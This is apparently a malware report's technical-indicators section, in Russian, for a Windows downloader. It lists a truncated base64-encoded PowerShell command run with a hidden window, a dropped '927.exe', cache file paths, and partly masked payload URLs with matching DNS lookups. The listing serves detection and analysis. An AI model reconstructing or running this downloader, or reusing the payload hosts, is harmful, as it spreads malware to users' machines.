Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAEIAUwBSAEEAaQBkAGsAPQAnAEkAQgBOAFoAVQBjAGMAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AFIASQB0AFkAUABgAFIAbwBgAFQAYABvAGMAYABPAEwAIgAgAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\927.exe
- http://mc##cher.cn/zb_users/gli8637/
- http://cs##jin.com/wp-admin/OjF/
- http://www.bj##00.com/wp-admin/fBcD2tb6z/
- http://de###iam.com/mstd/ie2/
- DNS ASK mc##cher.cn
- DNS ASK de##.com.vn
- DNS ASK cs##jin.com
- DNS ASK bj##00.com
- DNS ASK de###iam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAEIAUwBSAEEAaQBkAGsAPQAnAEkAQgBOAFoAVQBjAGMAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AFIASQB0AFkAUABgAFIAbwBgAFQAYABvAGMAYABPAEwAIgAgAD...' (со скрытым окном)